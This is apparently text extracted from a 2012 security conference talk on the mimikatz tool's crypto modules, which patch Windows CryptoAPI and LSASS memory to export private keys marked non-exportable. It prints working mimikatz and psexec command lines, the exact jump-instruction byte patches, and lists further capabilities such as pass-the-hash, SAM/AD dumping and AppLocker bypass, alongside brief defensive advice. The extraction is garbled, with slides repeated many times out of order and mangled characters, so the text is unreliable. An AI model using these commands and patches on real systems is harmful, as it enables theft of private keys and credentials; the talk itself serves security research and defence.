07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
